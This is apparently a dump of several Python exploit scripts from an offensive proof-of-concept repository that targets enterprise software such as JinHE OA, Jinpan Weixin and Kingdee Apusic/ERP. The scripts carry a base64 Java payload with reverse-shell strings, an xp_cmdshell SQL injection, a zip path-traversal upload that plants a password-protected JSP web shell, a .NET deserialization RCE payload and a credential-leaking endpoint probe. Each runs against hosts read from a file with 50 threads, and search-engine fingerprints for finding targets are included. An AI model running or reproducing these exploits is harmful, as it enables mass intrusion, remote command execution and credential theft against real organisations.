i5CeXRlQ2h1bmsMAIgAiQwBLgEvAQAIc2V0Qnl0ZXMBAAJbQgwBMAElAQAHZG9Xcml0ZQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAwBMQCJAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24MATIBMwcBNAEAAAwBNQE2AQAQY29tbWFuZCBub3QgbnVsbAwBNwEdAQAFIyMjIyMMATgBOQwBOgE7AQABOgwBPAE9AQAiY29tbWFuZCByZXZlcnNlIGhvc3QgZm9ybWF0IGVycm9yIQwAfwCADAE+AT8MAUABQQwAgQCCAQAQamF2YS9sYW5nL1RocmVhZAwAgwFCDAFDAIQBAAVAQEBAQAwAjACLAQAHb3MubmFtZQcBRAwBRQCLDAFGAR0BAAN3aW4BAARwaW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBRwFIAQAFIC1uIDQMAUkBHQEAAi9jAQAFIC10IDQBAAJzaAEAAi1jBwFKDAFLAUwMAIwBTQEAEWphdmEvdXRpbC9TY2FubmVyBwFODAFPAVAMAIMBUQEAAlxhDAFSAVMMAVQBVQwBVgEdDAFXAVAMAVgAhAEABy9iaW4vc2gMAIMBWQEAB2NtZC5leGUMAIwBWgEAD2phdmEvbmV0L1NvY2tldAwBWwEiDACDAVwMAV0BXgwBXwFVBwFgDAFhASIMAWIBIgcBYwwBZAEtDAFlAIQMAWYBZwwBaAEiDAFpAIQBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyAtPgwBagEdAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAI0AjgEAAkE0AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQANZ2V0U3VwZXJjbGFzcwEABHNpemUBAAMoKUkBABUoSSlMamF2YS9sYW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEKEkpVgEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBAAVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBABcoTGphdmEvbGFuZy9SdW5uYWJsZTspVgEABXN0YXJ0AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEADmdldEVycm9yU3RyZWFtAQAHZGVzdHJveQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEACGludFZhbHVlAQAWKExqYXZhL2xhbmcvU3RyaW5nO0kpVgEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGlzQ2xvc2VkAQATamF2YS9pby9JbnB1dFN0cmVhbQEACWF2YWlsYWJsZQEABHJlYWQBABRqYXZhL2lvL091dHB1dFN0cmVhbQEABXdyaXRlAQAFZmx1c2gBAAVzbGVlcAEABChKKVYBAAlleGl0VmFsdWUBAAVjbG9zZQEACmdldE1lc3NhZ2UAIQB+AB0AAQAPAAIAAgB/AIAAAAACAIEAggAAAAYAAQCDAIQAAgCFAAAD2AAIABEAAAKYKrcAAbgAArYAA0wrtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2+ogJqLRUEMjoFGQXHAAanAlYZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanAjgZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCFRkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEt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')",
55 |           "dbName":"383BAb7deFC825E6",
56 |           "dbPassword":"917982",
57 |           "userName":"917982"
58 |         }
59 |     try:
60 |         r = requests.post(vulurl, headers=headers,json=data,verify=False)
61 |         #print(r.status_code)
62 |         if "\\administrator" in r.text or  "root" in r.text[:20] :
63 |         #if r.status_code==200:
64 |             print(host+"    "+r.text)
65 |         else:
66 |             return 0
67 |             print (host+":false")
68 |     except:
69 |         return 0
70 |         print (host+":false")
71 | 
72 | if __name__ == '__main__':
73 |     file = sys.argv[1]
74 |     data = open(file)
75 |     reader = csv.reader(data)
76 |     with ThreadPoolExecutor(50) as pool:
77 |         for row in reader:
78 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/JinHE_OA_SQL_Rce_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="金和网络-金和OA"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 JinHE_OA_SQL_Rce_Exp.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | 
29 | def poc(host):
30 |     url = host
31 |     headers = {
32 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
33 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
34 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
35 |         "Accept-Encoding": "gzip, deflate",
36 |     }
37 |     data ="exec master..xp_cmdshell 'whoami'"
38 |     vulurl = "http://"+url + "/C6/Control/GetSqlData.aspx/.ashx"
39 |     try:
40 |         r = requests.post(vulurl, headers=headers,data=data)
41 |         if r.status_code==200 and "CDATA[nt" in r.text :
42 |             print("http://"+host+":true")
43 |         else:
44 |             return 0
45 |             print (host+":false")
46 |     except:
47 |         print (host+":false")
48 | 
49 | 
50 | if __name__ == '__main__':
51 |     file = sys.argv[1]
52 |     data = open(file)
53 |     reader = csv.reader(data)
54 |     with ThreadPoolExecutor(50) as pool:
55 |         for row in reader:
56 |             pool.submit(poc, row[0])
57 | 


--------------------------------------------------------------------------------
/Jinpan_Weixin_Getsysteminfo_Leak_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:icon_hash="116323821" && title=="微信管理后台"
 6 | # hunter:web.body="金盘微信管理平台"
 7 | 
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | 
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+----------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
25 |     print(
26 |         '+ EXP: python3 EasyCVR_Userlist_Leak_Poc.py url.txt                                               +')
27 |     print(
28 |         '+----------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8081'
32 | }  
33 | requests.packages.urllib3.disable_warnings()
34 | 
35 | def exp(host):
36 |     if "http" in host:
37 |         url = host
38 |     else:
39 |         url ="http://"+host
40 |     host1=url.replace("http://","")
41 |     host2=host1.replace("https://","")
42 |     headers = {
43 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
44 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
45 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
46 |         "Accept-Encoding": "gzip, deflate",
47 |         "Host": "%s" % host2
48 |     }
49 |     vulurl = url + "/admin/weichatcfg/getsysteminfo"
50 |     try:
51 |         r = requests.get(vulurl,headers=headers,verify=False)
52 |         #print(r.text)
53 |         if "password" and "machinecode" in r.text :
54 |             print(url+r.text)
55 |             #print(r.text)     
56 |         else:
57 |             return 0
58 |             print (host+":false")
59 |     except:
60 |         return 0
61 |         print (host+":false")
62 | 
63 | if __name__ == '__main__':
64 |     file = sys.argv[1]
65 |     data = open(file)
66 |     reader = csv.reader(data)
67 |     with ThreadPoolExecutor(50) as pool:
68 |         for row in reader:
69 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Kingdee_Apusic_AppServer_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：app="Apusic应用服务器"  fid="rqhtFwF4sIF7wTOroKTQGw=="
 6 | # zoomeye:Apusic应用服务器
 7 | # hunter: web.similar_id="c85578f46ba3b40d6c07fd0f502c090b"
 8 | 
 9 | 
10 | import sys
11 | import requests
12 | import csv
13 | import urllib3
14 | import hashlib
15 | from concurrent.futures import ThreadPoolExecutor
16 | urllib3.disable_warnings()
17 | if len(sys.argv) != 2:
18 |     print(
19 |         '+----------------------------------------------------------------------------------------------------------+')
20 |     print(
21 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
22 |     print(
23 |         '+----------------------------------------------------------------------------------------------------------+')
24 |     print(
25 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
26 |     print(
27 |         '+ EXP: python3 Kingdee_Apusic_AppServer_Upload_File_Poc.py url.txt                                         +')
28 |     print(
29 |         '+----------------------------------------------------------------------------------------------------------+')
30 |     sys.exit()
31 | proxysdata = {
32 | 'http': '127.0.0.1:8080'
33 | }  
34 | def exp(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "Host": "%s" %host2,
43 |         "Accept-Encoding": "gzip",
44 |         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko)Version/12.0.3 Safari/605.1.15",
45 |         "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd"
46 |     }
47 |     data ='------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="appName"\r\n\r\n333\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="deployInServer"\r\n\r\nfalse\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="clientFile"; filename="aaaa.zip"\r\nContent-Type: application/x-zip-compressed\r\n\r\n'+r'{{unquote("PK\x03\x04\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00../../../../applications/default/public_html/shell2.jsp<%\x0d\x0a    if \x28\"admin\".equals\x28request.getParameter\x28\"pwd\"\x29\x29\x29 \x7b\x0d\x0a        java.io.InputStream input = Runtime.getRuntime\x28\x29.exec\x28request.getParameter\x28\"cmd\"\x29\x29.getInputStream\x28\x29;\x0d\x0a        int len = -1;\x0d\x0a        byte[] bytes = new byte[4092];\x0d\x0a        while \x28\x28len = input.read\x28bytes\x29\x29 != -1\x29 \x7b\x0d\x0a            out.println\x28new String\x28bytes, \"GBK\"\x29\x29;\x0d\x0a        \x7d\x0d\x0a    \x7d\x0d\x0a%>PK\x01\x02\x14\x03\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00../../../../applications/default/public_html/shell2.jspPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00e\x00\x00\x00\xb9\x01\x00\x00\x00\x00")}}'+'\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="archivePath"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="baseContext"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="startType"\r\n\r\nauto\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="loadon"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="virtualHost"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="allowHosts"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd\r\nContent-Disposition: form-data; name="denyHosts"\r\n\r\n\r\n------WebKitFormBoundaryd9acIBdVuqKWDJbd--'
48 |     vulurl = url + "/admin//protect/application/deployApp"
49 |     vulurl1 = url + "/shell2.jsp?pwd=admin&cmd=whoami"
50 |     
51 |     try:
52 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
53 |         if  r.status_code==200:
54 |             #print(url+"存在上传接口")
55 |             r2=requests.get(vulurl1,headers=headers,verify=False)
56 |             if r2.status_code==200:
57 |                 print("文件地址为:"+url+"/shell2.jsp?pwd=admin&cmd=whoami")
58 |             #print("http://"+host+":true 文件地址为："+"")
59 |         else:
60 |             return 0
61 |             print (host+":false")
62 |     except:
63 |         return 0
64 |         print (host+":false")
65 | 
66 | 
67 | if __name__ == '__main__':
68 |     file = sys.argv[1]
69 |     data = open(file)
70 |     reader = csv.reader(data)
71 |     with ThreadPoolExecutor(50) as pool:
72 |         for row in reader:
73 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Kingdee_Erp_Unserialize_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="金蝶云星空-管理中心"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+---------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Hikvison_iSecure_Center_Upload_File.py url.txt                                              +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | }  
31 | def poc(host):
32 |     url = host
33 |     headers = {
34 |         "Content-Type": "text/json",
35 |         "cmd": "whoami",
36 |         "Host":"%s" %host   
37 |     }
38 |     data ='''{
39 |             "ap0": "AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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